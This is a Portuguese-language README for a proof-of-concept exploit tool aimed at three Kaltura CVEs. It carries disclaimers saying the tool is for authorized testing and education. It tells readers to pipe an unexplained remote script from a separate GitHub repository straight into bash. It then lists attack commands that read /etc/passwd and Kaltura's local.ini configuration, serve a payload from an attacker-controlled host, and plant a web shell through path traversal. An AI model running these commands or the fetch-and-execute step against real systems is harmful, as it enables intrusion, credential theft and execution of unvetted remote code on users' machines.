
Exploits de prova de conceito para CVE-2026-19912, CVE-2026-19913 e CVE-2026-19914, demonstrando leitura de arquivos e execução remota de código no Kaltura, destinados a testes de segurança autorizados e fins educacionais.
Execute a versão mais recente do script de download externo diretamente do GitHub:
bash <(curl -fsSL https://raw.githubusercontent.com/HORKimhab/collection-scripts/main/get-svn.sh)
Este comando requer Bash e
curl. Revise o script remoto antes de executá-lo se você não confiar na fonte.
Use este projeto apenas em ambientes seguros e autorizados, como:
Exemplo de configuração:
git clone <repository-url>
cd <repository-name>
# O projeto usa Python, siga abaixo
# Crie um ambiente virtual
python -m venv venv
# Ative o ambiente virtual
# macOS / Linux
source venv/bin/activate
# Windows (Git Bash / WSL)
source venv/Scripts/activate
# Instale as dependências
pip install -r requirements.txt
Exemplo de uso:
# 1. Leitura de arquivo (mais confiável, funciona conforme descrito no artigo)
python3 kaltura_poc.py fileread http://127.0.0.1 -f /etc/passwd
python3 kaltura_poc.py fileread http://127.0.0.1 \
-f /opt/kaltura/app/configurations/local.ini --try-versions
# 2. Apenas o servidor de payload (use com Burp / curl manualmente)
python3 kaltura_poc.py serve --lport 8888
# 3. Estrutura da cadeia completa
python3 kaltura_poc.py rce http://127.0.0.1 \
--lhost 172.17.0.1 --lport 8888 \
--payload stdclass \
--shell '../../../../../../../../var/www/html/shell.php'
Um repositório para aprender, testar e pesquisar conceitos de segurança cibernética em ambientes controlados.
Este repositório é destinado exclusivamente a pesquisa educacional e de segurança autorizada.
Ele foi projetado para ajudar os usuários a aprender sobre:
Use este repositório somente em ambientes onde você tenha permissão, como:
O uso não autorizado ou ilegal é estritamente proibido.
O autor e os colaboradores não são responsáveis por qualquer dano, uso indevido, problemas legais ou perdas causados por este projeto.
Ao usar este repositório, você concorda que:
Este projeto destina-se a:
Siga práticas de divulgação responsável e cumpra todas as leis aplicáveis.
Para divulgação responsável ou colaboração, entre em contato com o mantenedor do repositório pelo GitHub.
Explore a Coleção de PoCs de CVEs para recursos adicionais de prova de conceito de CVEs destinados a pesquisa e educação autorizadas em segurança.